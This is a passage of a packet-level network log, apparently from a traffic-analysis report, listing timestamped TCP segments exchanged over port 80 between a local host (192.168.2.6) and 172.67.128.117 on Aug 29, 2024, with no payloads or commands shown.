                                    Aug 29, 2024 12:02:35.373980999 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.373995066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374018908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374037981 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374048948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374062061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374077082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374083042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374099970 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374130011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374160051 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374171019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374185085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.374196053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.374228001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.416017056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416049004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416071892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416085005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416096926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416110039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416109085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.416121006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416134119 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.416140079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.416188955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461436987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461577892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461910963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461925030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461963892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.461973906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461987019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.461997986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462007999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462059021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462079048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462090969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462101936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462121010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462121964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462137938 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462171078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462275982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462286949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462299109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462310076 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462316036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462321997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462335110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462344885 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462346077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462357044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462367058 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462393999 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462584019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462595940 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462614059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462625027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462626934 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462635994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462644100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462647915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462660074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462671995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462677002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462691069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462697983 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462737083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462898970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462912083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462922096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462933064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462944031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462944984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462954998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462960005 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462971926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462984085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.462992907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.462995052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463006020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463016033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463023901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463027000 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463037968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463042021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463048935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463059902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463071108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463072062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463083982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463099003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463099957 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463115931 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463119030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463129997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463140011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463140965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463161945 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463187933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463223934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463237047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463247061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463264942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463278055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463279009 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463290930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463301897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463310003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463315010 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463325977 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463351011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463465929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463481903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463495970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463500023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463509083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463521004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463526964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463552952 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463608027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463618994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463625908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463630915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463638067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463641882 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463694096 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463704109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463716030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463727951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463738918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463740110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463749886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463762045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463773966 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463773966 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463784933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463804960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463819027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.463943005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.463998079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464085102 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464096069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464107037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464118958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464126110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464132071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464143038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464154959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464174032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464231014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464241982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464251995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464257002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464274883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464276075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464287043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464299917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464306116 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464309931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464323044 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464334965 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464350939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464375973 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464495897 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464507103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464518070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464529037 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464536905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464544058 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464572906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464631081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464648008 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464654922 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464659929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464673042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464673042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464685917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464689016 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464705944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464737892 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464745045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464756012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464796066 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464833975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464847088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464858055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464859009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464870930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464884043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464901924 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464914083 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464920998 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464931965 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.464946985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464961052 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.464998007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506673098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506714106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506726980 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506743908 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506752014 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506755114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506764889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506778002 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.506784916 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.506822109 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552611113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552671909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552751064 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552762032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552773952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552788019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552798986 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552809954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552823067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552825928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552825928 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552843094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552849054 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552855015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552865028 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552876949 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552905083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552905083 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552922964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552941084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552949905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552959919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552970886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552978992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552978992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.552987099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.552998066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553009033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553018093 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553035975 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553081036 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553420067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553430080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553441048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553477049 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553493023 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553500891 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553512096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553528070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553539038 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553550959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553566933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553566933 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553610086 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553731918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553742886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553751945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553765059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553777933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553780079 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553788900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553792953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553803921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553814888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553826094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553837061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553850889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553850889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553881884 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553909063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553920984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553945065 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.553960085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.553965092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554153919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554167032 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554177046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554182053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554188967 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554189920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554200888 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554210901 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554217100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554223061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554234982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554244995 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554244995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554258108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554265022 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554269075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554280996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554286003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554291964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554306030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554306030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554404974 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554475069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554486036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554502964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554513931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554522038 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554523945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554534912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554547071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554553032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554557085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554569006 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554580927 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554599047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554599047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554636955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554636955 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554718971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554730892 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554764032 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554775953 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554790020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554800034 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554810047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554822922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554835081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554841042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554841042 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554845095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554856062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554867983 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.554883003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554883003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.554934978 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.555007935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555021048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555037975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555044889 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.555049896 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555062056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555071115 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.555095911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.555114031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:35.555331945 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555342913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555354118 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:35.555367947 CEST8049717172.67.128.117192.168.2.6
